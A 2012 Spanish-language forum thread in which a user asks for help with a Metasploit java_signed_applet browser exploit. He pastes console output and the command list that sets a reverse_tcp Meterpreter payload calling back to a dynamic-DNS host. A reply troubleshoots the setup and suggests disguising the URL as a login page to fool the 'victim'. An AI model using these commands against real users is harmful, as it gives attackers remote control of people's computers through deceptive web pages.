Foro de elhacker.net

Seguridad Informática => Seguridad => Mensaje iniciado por: BlackSS en 6 Octubre 2012, 00:02 am


Título: Ayuda con metasploit
Publicado por: BlackSS en 6 Octubre 2012, 00:02 am
Buenas, estamos practicando el metasploit con unos amigos (Supongo que un tema sobre metasploit va aqui) Ahora vereis lo que me dice el metasploit, la version que es y en lo que falla.   


Please wait while the Metasploi
Starting Metasploit Console...

 __________________________________
|

|                   METASPLOIT CYBE

|__________________________________

      \
       \     .
        \
         \
          \            +
           *

    X                             /
                                 /
                                /
                               /
                      .       /
     .                       /
                            /
                           *
                  +


####      __     __     __

####    /    \ /    \ /    \      #

###################################

###################################

# WAVE 4 ######## SCORE 31337 #####


 =[ metasploit v4.4.0-release
+ -- --=[ 902 exploits - 528 auxili
+ -- --=[ 250 payloads - 28 encoder


Successfully loaded plugin: pro
msf > use exploit/multi/browser/java_sign
ed_applet
msf  exploit(java_signed_applet) > set PA
YLOAD java/meterpreter/reverse_tcp
PAYLOAD => java/meterpreter/reverse_tcp
msf  exploit(java_signed_applet) > set LH
OST blackss.zapto.org
LHOST => blackss.zapto.org
msf  exploit(java_signed_applet) > set TA
RGET 0
TARGET => 0
msf  exploit(java_signed_applet) > set UR
IPATH /set SRVPORT 8080
URIPATH => /set SRVPORT 8080
msf  exploit(java_signed_applet) > set LP
ORT 4444
LPORT => 4444
msf  exploit(java_signed_applet) > exploi
t
Exploit running as background job.
msf  exploit(java_signed_applet) >
[-] Handler failed to bind to 85.61.16.10
1:4444
Started reverse handler on 0.0.0.0:44
44
Using URL: http://0.0.0.0:8080/set SR
VPORT 8080
  Local IP: http://192.168.1.12:8080/s
et SRVPORT 8080
Server started.



Ahora se supone que mi amigo, que entra a blackss.zapto.org:8080 deberia salirme en el metasploit. El problema es que no sale. Cuando ellos se meten, lo que les sale es :



Esta página web no está disponible
Se ha interrumpido la conexión con blackss.zapto.org.

Esto sale en chrome, despues de esperar un rato.   

Cual es el problema? Los comandos a utilizar fueron :

use exploit/multi/browser/java_signed_applet
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST reasen.zapto.org
set TARGET 0
set URIPATH /
set SRVPORT 8080
set LPORT 4444
exploit


La version de metasploit es :  metasploit v4.4.0-release


Agradeceria mucho que respondieran y lo arreglaran...

Título: Re: Ayuda con metasploit
Publicado por: Epzylon en 9 Octubre 2012, 22:44 pm
Estas usando mail metasploit:

Para empezar esto es un error:
Código:
Handler failed to bind to 85.61.16.10
1:4444

LHOST -> Debe ir tu ip local. Si tu ip es  85.61.16.10 esta bien, Si no NO. A esta ip debe acceder tu victima.
URLPATH -> tiene que ser algo como /login.htm o algo asi, es para simular el acceso a una web.

Aún que no soy experto en el tema, creo que tenes que leer mas para poder saber que estas haciendo.
Creo que este link te va a ayudar:
http://www.offensive-security.com/metasploit-unleashed/Java_Applet_Infection (http://www.offensive-security.com/metasploit-unleashed/Java_Applet_Infection)


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines